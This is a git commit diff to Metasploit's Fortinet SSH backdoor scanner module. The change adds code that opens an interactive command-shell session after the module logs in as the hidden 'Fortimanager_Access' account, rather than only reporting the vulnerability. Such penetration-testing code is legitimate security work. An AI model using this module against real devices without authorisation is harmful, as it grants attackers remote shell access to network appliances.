Use start_session in fortinet_backdoor

Still get "Unknown admin user ''" from a shell channel request, @busterb's more complete implementation notwithstanding. Hoping we fix this in a subsequent commit or related PR. Please see #6612 and #9524.
2018-02-21 15:21:14 -06:00 · 2018-02-21 15:21:14 -06:00 · 854ac67b8e
parent 78822fd799
commit 854ac67b8e
1 changed files with 25 additions and 9 deletions
--- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@ -7,6 +7,7 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SSH
  include Msf::Exploit::Remote::Fortinet
  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::CommandShell
  include Msf::Auxiliary::Report

  def initialize(info = {})
@ -63,15 +64,30 @@ class MetasploitModule < Msf::Auxiliary
      return
    end

-    if ssh
-      print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
-      report_vuln(
-        host: ip,
-        name: self.name,
-        refs: self.references,
-        info: ssh.transport.server_version.version
-      )
-    end
+    return unless ssh
+
+    print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
+
+    version = ssh.transport.server_version.version
+
+    report_vuln(
+      host: ip,
+      name: self.name,
+      refs: self.references,
+      info: version
+    )
+
+    shell = Net::SSH::CommandStream.new(ssh)
+
+    return unless shell
+
+    info = "Fortinet SSH Backdoor (#{version})"
+
+    ds_merge = {
+      'USERNAME' => 'Fortimanager_Access'
+    }
+
+    start_session(self, info, ds_merge, false, shell.lsock)
  end

  def rport